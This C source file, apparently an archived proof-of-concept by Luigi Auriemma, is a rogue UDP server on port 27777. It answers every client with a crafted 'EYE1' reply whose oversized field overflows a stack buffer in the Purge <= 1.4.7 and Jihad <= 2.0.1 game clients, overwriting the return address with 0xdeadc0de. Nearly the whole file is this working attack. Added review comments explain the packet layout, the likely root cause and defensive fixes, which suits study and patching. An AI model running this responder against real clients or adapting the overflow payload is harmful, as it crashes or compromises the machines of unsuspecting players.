C/C++ Source or Header  |  2005-02-12  |  4KB  |  158 lines

  1. /*
  2.  
  3. by Luigi Auriemma
  4.  
  5. UNIX & WIN VERSION
  6. */
  7.  
  8.  
  9. #include <stdio.h>
  10. #include <stdlib.h>
  11. #include <string.h>
  12.  
  13. #ifdef WIN32
  14.     #include <winsock.h>
  15.     #include "winerr.h"
  16.  
  17.     #define close   closesocket
  18. #else
  19.     #include <unistd.h>
  20.     #include <sys/socket.h>
  21.     #include <sys/types.h>
  22.     #include <arpa/inet.h>
  23.     #include <netdb.h>
  24. #endif
  25.  
  26.  
  27.  
  28.  
  /*
   * Build-time constants for this proof of concept.
   *   VER    - version string appended to the banner printed by main().
   *   BUFFSZ - size in bytes of the receive buffer main() allocates.
   *   PORT   - UDP port main() binds and listens on.
   *   PCK    - the fixed reply main() sends to every peer that sends a
   *            datagram to that port.
   *
   * PCK layout, as far as the bytes below show: the tag "EYE1", then a run
   * of fields, each led by one length byte whose value is the text length
   * plus one ("\x06" "purge", "\x0a" "destroyer", "\x0e" "steel chamber").
   * The fourth field declares length 0xff, far longer than the name and
   * value fields around it, and is made of 'a' filler surrounding a 4-byte
   * marker. The marker is 0xdeadc0de in little-endian order, the value the
   * banner in main() says will overwrite the return address. It is a
   * recognisable placeholder, not an address chosen to run code, so the
   * expected effect is presumably a client crash - confirm on a test client.
   * The trailing "\x01" looks like an empty field that ends the list - TODO
   * confirm.
   *
   * NOTE(review): the root cause is presumably a client that copies a
   * length-prefixed field into a fixed-size stack buffer without comparing
   * the declared length with the destination size - confirm against the
   * client code. Defensive takeaways: bound every field copy by the size of
   * its destination, reject replies whose field lengths exceed what a name
   * or value can legitimately hold, and treat an "EYE1" reply carrying a
   * field this long as anomalous when inspecting traffic on this port.
   */
  29. #define VER     "0.1"
  30. #define BUFFSZ  2048
  31. #define PORT    27777
  32. #define PCK     "EYE1" \
  33.                 "\x06" "purge" \
  34.                 "\x06" "27777" \
  35.                 "\x0a" "destroyer" \
  36.                 "\xff" \
  37.                 "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
  38.                 "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
  39.                 "\xde\xc0\xad\xde"      /* return address: 0xdeadc0de, little-endian marker */ \
  40.                 "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
  41.                 "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
  42.                 "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
  43.                 "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
  44.                 "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
  45.                 "aaaaaaaaaaaaaaaaaaaaaaaaaa" \
  46.                 "\x0e" "steel chamber"  /* author's note: this field is vulnerable as well */ \
  47.                 "\x06" "2.0.0" \
  48.                 "\x02" "0" \
  49.                 "\x02" "0" \
  50.                 "\x03" "20" \
  51.                 "\x04" "ded" \
  52.                 "\x02" "1" \
  53.                 "\x0b" "maxclients" \
  54.                 "\x03" "20" \
  55.                 "\x05" "time" \
  56.                 "\x05" "1800" \
  57.                 "\x07" "rounds" \
  58.                 "\x02" "3" \
  59.                 "\x03" "ff" \
  60.                 "\x02" "1" \
  61.                 "\x0b" "lamerguard" \
  62.                 "\x02" "1" \
  63.                 "\x09" "deadtalk" \
  64.                 "\x02" "1" \
  65.                 "\x06" "lives" \
  66.                 "\x04" "200" \
  67.                 "\x07" "portal" \
  68.                 "\x02" "2" \
  69.                 "\x08" "persist" \
  70.                 "\x02" "1" \
  71.                 "\x09" "maxlevel" \
  72.                 "\x03" "21" \
  73.                 "\x09" "minlevel" \
  74.                 "\x02" "1" \
  75.                 "\x06" "altar" \
  76.                 "\x02" "1" \
  77.                 "\x01"
  78.  
  79.  
  80.  
  81.  
  82. void std_err(void);
  83.  
  84.  
  85.  
  86.  
  /*
   * Proof-of-concept responder for the client-side overflow named in the
   * banner (Purge <= 1.4.7 and Jihad <= 2.0.1).
   *
   * Prints the banner, binds UDP port PORT on all local addresses, then
   * loops forever: receive one datagram, print the sender's address and
   * port, and send PCK back to that sender. The content of the received
   * datagram is never inspected. argc and argv are unused.
   *
   * Every failed call goes to std_err(), which in the non-Windows build
   * prints the error and exits with status 1. The loop has no exit, so the
   * function does not return in practice.
   *
   * NOTE(review): the banner describes the flaw as being in the client's
   * broadcast handling, so presumably clients send a discovery datagram to
   * this port and parse whatever reply arrives - confirm. If so, the fix
   * belongs in the client's reply parser (length checks before copying),
   * and a host answering on this port with an oversized field is the
   * observable to look for on the network.
   */
  87. int main(int argc, char *argv[]) {
  88.     int         sd,
  89.                 err,
  90.                 on = 1,
  91.                 psz;
  92.     struct  sockaddr_in peer;
  93.     u_char      *buff;
  94.  
  95.  
          /* Unbuffered stdout, so each client line is shown as soon as it is printed. */
  96.     setbuf(stdout, NULL);
  97.  
  98.     fputs("\n"
  99.         "Purge <= 1.4.7 and Jihad <= 2.0.1 broadcast client's buffer overflow "VER"\n"
  100.         "by Luigi Auriemma\n"
  101.         "e-mail: aluigi@altervista.org\n"
  102.         "web:    http://aluigi.altervista.org\n"
  103.         "\n"
  104.         "Return address will be overwritten by 0xdeadc0de\n"
  105.         "\n", stdout);
  106.  
  107. #ifdef WIN32
           /* Winsock start-up; the return value of WSAStartup() is not checked. */
  108.     WSADATA    wsadata;
  109.     WSAStartup(MAKEWORD(1,0), &wsadata);
  110. #endif
  111.  
           /* Listen on every local address. Only these three members of peer are
              set; the rest of the structure is left uninitialised. */
  112.     peer.sin_addr.s_addr = INADDR_ANY;
  113.     peer.sin_port        = htons(PORT);
  114.     peer.sin_family      = AF_INET;
  115.     psz                  = sizeof(peer);
  116.  
  117.     printf("\nBinding UDP port %u\n", PORT);
  118.  
  119.     sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
  120.     if(sd < 0) std_err();
  121.  
           /* SO_REUSEADDR is enabled before bind() to relax the address-reuse check. */
  122.     err = setsockopt(sd, SOL_SOCKET, SO_REUSEADDR, (char *)&on, sizeof(on));
  123.     if(err < 0) std_err();
  124.     err = bind(sd, (struct sockaddr *)&peer, psz);
  125.     if(err < 0) std_err();
  126.  
           /* Receive buffer; it is never freed because the loop below never ends. */
  127.     buff = malloc(BUFFSZ);
  128.     if(!buff) std_err();
  129.  
  130.     fputs("\nClients:\n", stdout);
  131.     while(1) {
               /* peer is reused here: recvfrom() overwrites it with the sender's address.
                  NOTE(review): psz is an int passed as the value-result address length;
                  POSIX declares that argument as socklen_t *, and psz is not reset
                  between iterations. */
  132.         err = recvfrom(sd, buff, BUFFSZ, 0, (struct sockaddr *)&peer, &psz);
  133.         if(err < 0) std_err();
  134.  
               /* htons() performs the network-to-host swap here; ntohs() is the
                  conventional name for the same conversion. */
  135.         printf("  %s:%hu\n", inet_ntoa(peer.sin_addr), htons(peer.sin_port));
  136.  
               /* sizeof(PCK) - 1 leaves out the string literal's terminating NUL, so
                  only the packet bytes go on the wire. The reply is sent to whoever
                  sent the datagram, whatever that datagram contained. */
  137.         err = sendto(sd, PCK, sizeof(PCK) - 1, 0, (struct sockaddr *)&peer, psz);
  138.         if(err < 0) std_err();
  139.     }
           /* Not reached: the loop above has no break. */
  140.     close(sd);
  141.  
  142.     return(0);
  143. }
  144.  
  145.  
  146.  
  147.  
  148.  
  149. #ifndef WIN32
           /*
            * Fatal-error helper for the non-Windows build: perror() prints
            * "\nError" followed by the message for the current errno, then the
            * process exits with status 1. It never returns to the caller.
            * NOTE(review): the WIN32 build presumably gets its std_err() from
            * "winerr.h", which is not part of this listing - confirm.
            */
  150.     void std_err(void) {
  151.         perror("\nError");
  152.         exit(1);
  153.     }
  154. #endif
  155.  
  156.  
  157.  
  158.